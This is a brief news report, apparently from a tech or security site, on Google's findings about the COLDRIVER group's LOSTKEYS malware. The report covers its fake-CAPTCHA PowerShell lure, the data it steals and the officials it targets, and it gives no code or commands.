A Russian hacking group known as COLDRIVER has created the LOSTKEYS malware. It uses fake CAPTCHAs to gain access to sensitive data of high-ranking officials. The new type of cyberattacks targets the diplomatic corps, civil servants, and public organizations.
According to Google Threat Intelligence Group (GTIG), the COLDRIVER hacker group, also known as UNC4057 and Star Blizzard, created the LOSTKEYS malware. The attack starts with a fake CAPTCHA on a phishing resource, access to which is often sent via email.
When a user tries to pass verification, they receive instructions to copy and paste a PowerShell command into the Windows console. After executing the command, the malware starts working on the device. It looks for files of certain formats, steals credentials, emails, and contact information, and then transfers it to the attackers.
It is emphasized that these attacks are aimed at officials who have access to confidential information. In particular, we are talking about NATO representatives, journalists, consultants to government agencies and non-governmental organizations. Special attention is paid to individuals associated with Ukraine, which corresponds to the strategic goals of the Russian Federation. The threat from COLDRIVER has been known for some time: the group has been actively attacking government agencies, public organizations and journalists. Previous attempts involved the use of legitimate tools, such as Maltego, to mask malicious components. The latest campaigns were recorded in April 2025, but the first samples date back to December 2023.
The emergence of LOSTKEYS and the use of fake CAPTCHAs indicate a new stage in the social engineering methods used by Russian hackers. Timely detection and blocking of domains distributing malicious code have become a key step in countering this threat.
37 
49 
68 